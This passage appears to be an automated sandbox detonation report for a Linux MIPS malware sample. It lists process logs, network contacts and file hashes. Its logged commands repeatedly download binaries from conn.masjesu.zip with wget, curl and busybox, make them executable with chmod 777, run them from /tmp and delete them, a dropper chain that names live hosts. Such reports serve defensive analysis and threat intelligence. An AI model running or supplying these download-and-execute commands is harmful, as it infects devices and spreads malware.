[rm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/chmod
[chmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB
[./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/rm
[rm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/chmod
[chmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a
[./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/rm
[rm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/chmod
[chmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ
[./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/rm
[rm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/chmod
[chmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo
[./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/rm
[rm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/chmod
[chmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R
[./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/rm
[rm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/chmod
[chmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5
[./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/rm
[rm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/chmod
[chmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M
[./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/rm
[rm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/chmod
[chmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm
[./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/rm
[rm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/chmod
[chmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an
[./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/rm
[rm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ
| MD5 | c3da85a3173a4ec9d42682016f6a69e2 |
| SHA1 | b644cacfbf06e841788ab8deb5e388ef7ddf982d |
| SHA256 | 77df749f6bbe85442500437f7e798f46b9635da344811ae3b4bf7d43048ee9bb |
| SHA512 | ff3c45bb810169a269b1d0edcfc251c2b31e4acaec0acf1f8a561752b261fcba76ad0f5f5b298f64c50afa7ac9b99262b25af161451e83b14b202c8d33f2eaeb |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-24 01:27
Reported
2024-11-24 01:29
Platform
debian9-mipsel-20240418-en
Max time kernel
80s
Max time network
82s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | N/A |
| N/A | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | N/A |
| N/A | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | N/A |
| N/A | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | N/A |
| N/A | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | N/A |
| N/A | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | N/A |
| N/A | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | N/A |
| N/A | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | N/A |
| N/A | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | N/A |
| N/A | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | N/A |
| N/A | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | N/A |
| N/A | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | N/A |
| N/A | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | N/A |
| N/A | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | N/A |
| N/A | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | N/A |
| N/A | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | N/A |
| N/A | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | N/A |
| N/A | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | N/A |
| N/A | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | N/A |
| N/A | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | N/A |
| N/A | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | N/A |
| N/A | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | N/A |
| N/A | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | N/A |
| N/A | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | N/A |
| N/A | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | N/A |
| N/A | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | N/A |
| N/A | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | N/A |
| N/A | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
